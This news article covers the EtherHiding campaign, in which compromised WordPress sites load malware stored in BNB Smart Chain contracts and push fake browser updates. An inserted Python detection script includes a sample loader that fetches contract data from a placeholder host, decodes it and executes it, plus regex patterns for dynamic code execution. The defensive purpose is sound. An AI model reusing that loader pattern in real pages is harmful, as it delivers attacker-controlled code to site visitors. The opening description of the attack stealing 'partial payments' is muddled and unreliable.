
Hackers Are Now Using the Blockchain to Hide Their Malware

BY Andrew Rossow

October 16, 2023

An Oct. 15 report from security firm Guardio Labs revealed a new “blackhat” cybersecurity threat that hackers are using as a mechanism to embed malicious code that is designed to steal partial payments from blockchain contracts. 

Dubbed “EtherHiding,” the attack involves infiltrating WordPress websites and implanting code that retrieves partial payloads from blockchain contracts; the attackers store those payloads in smart contracts on BSC (BNB Smart Chain). These smart contracts effectively function as clandestine, anonymous hosting platforms for malicious code.

What makes this attack particularly insidious is its adaptability. Hackers have the ability to modify the code and change attack methods at their discretion. 

[Figure: The attack flow, from querying the blockchain to total site defacing and malware download. Credit: Guardio Labs]

Most recently, they have employed fake browser updates as their delivery mechanism. Victims are enticed to update their web browsers via a counterfeit landing page and link. Within the payload lies JavaScript code that retrieves additional instructions from domains controlled by the attackers. This ultimately leads to complete site defacement, with counterfeit browser update notifications serving as vehicles for malware distribution.

The “flexibility” of EtherHiding enables black hatters to alter the attack chain with each new blockchain transaction, making mitigation efforts challenging.
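Because the payload can change with every new transaction, a site owner cannot rely on matching the malware itself; what stays constant is the shape of the injected loader. The script below is an added detection example written for this article, not code from Guardio Labs or from the report, and it assumes (as an editorial assumption, not a detail the article states) that the loader reads contract return data with the standard Ethereum JSON-RPC method `eth_call` and then executes the decoded result in the browser. It scans the inline scripts of a page and flags only those that combine a contract read with dynamic code execution, so a legitimate dapp that merely reads and displays a value is not flagged. The sample page, the indicator names and the host `rpc.example.invalid` are all constructed for the example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: a WordPress page body with three inline scripts.
# None of this is real injected code; it only carries the indicator shapes
# the scanner looks for. The RPC host is a placeholder (.invalid TLD).
SAMPLE_PAGE = """
<html><body>
<script>
  // benign: simple analytics ping
  fetch('/wp-json/site/v1/ping', {method: 'POST'});
</script>
<script>
  // benign dapp: reads a value from a contract and displays it
  fetch('https://rpc.example.invalid', {method: 'POST',
    body: JSON.stringify({jsonrpc: '2.0', method: 'eth_call', id: 1,
      params: [{to: '0xCONTRACT', data: '0xABCDEF'}, 'latest']})})
    .then(r => r.json()).then(j => { document.getElementById('v').textContent = parseInt(j.result, 16); });
</script>
<script>
  // suspicious: reads contract return data, decodes the hex to text, executes it
  fetch('https://rpc.example.invalid', {method: 'POST',
    body: JSON.stringify({jsonrpc: '2.0', method: 'eth_call', id: 1,
      params: [{to: '0xCONTRACT', data: '0x12345678'}, 'latest']})})
    .then(r => r.json()).then(j => {
      var h = j.result.slice(2), s = '';
      for (var i = 0; i < h.length; i += 2) s += String.fromCharCode(parseInt(h.substr(i, 2), 16));
      new Function(s)();
    });
</script>
</body></html>
"""

# Heuristic indicators (editorial assumptions about the loader's shape):
#   json_rpc_eth_call - the script issues an eth_call, i.e. reads contract data
#   hex_to_text       - it converts returned hex into characters
#   dynamic_exec      - it turns text into running code or injects a <script>
INDICATORS: dict[str, re.Pattern[str]] = {
    "json_rpc_eth_call": re.compile(r"['\"]eth_call['\"]"),
    "hex_to_text": re.compile(r"\bfromCharCode\b"),
    "dynamic_exec": re.compile(
        r"\beval\s*\(|new\s+Function\s*\(|createElement\s*\(\s*['\"]script['\"]|\.innerHTML\s*="
    ),
}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)


@dataclass
class Finding:
    script_index: int       # position of the inline <script> in the page
    indicators: list[str]   # which indicators matched
    suspicious: bool        # True only for the contract-read + execute combination


def scan_page(html: str) -> list[Finding]:
    """Return one Finding per inline script in the page."""
    findings: list[Finding] = []
    for idx, body in enumerate(SCRIPT_RE.findall(html)):
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        # The combination is what matters: reading contract return data AND
        # turning it into executable code. A dapp that only reads is not flagged.
        suspicious = "json_rpc_eth_call" in hits and "dynamic_exec" in hits
        findings.append(Finding(idx, hits, suspicious))
    return findings


def suspicious_scripts(html: str) -> list[int]:
    """Indices of inline scripts that should be reviewed by hand."""
    return [f.script_index for f in scan_page(html) if f.suspicious]


if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        status = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"script #{f.script_index}: {status} {f.indicators}")
```

Run against a real site, the scanner would be pointed at the rendered HTML of each page (and at theme and plugin files, where injected loaders are usually written); a hit is a reason to diff the files against a clean copy of the theme, not proof of compromise on its own.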

Nati Tal, Head of Cybersecurity at Guardio Labs, and fellow security researcher Oleg Zaytsev emphasized that because WordPress sites “are so vulnerable and frequently compromised,” they serve as a “primary gateway” for these types of threats to impact a significant number of people, as WordPress powers approximately 43% of all websites. 

Once these compromised smart contracts are deployed, they operate autonomously, leaving Binance with little recourse other than relying on its developer community to flag malicious code within contracts when detected.

Editor’s note: This article was written by an nft now staff member in collaboration with OpenAI’s GPT-4.
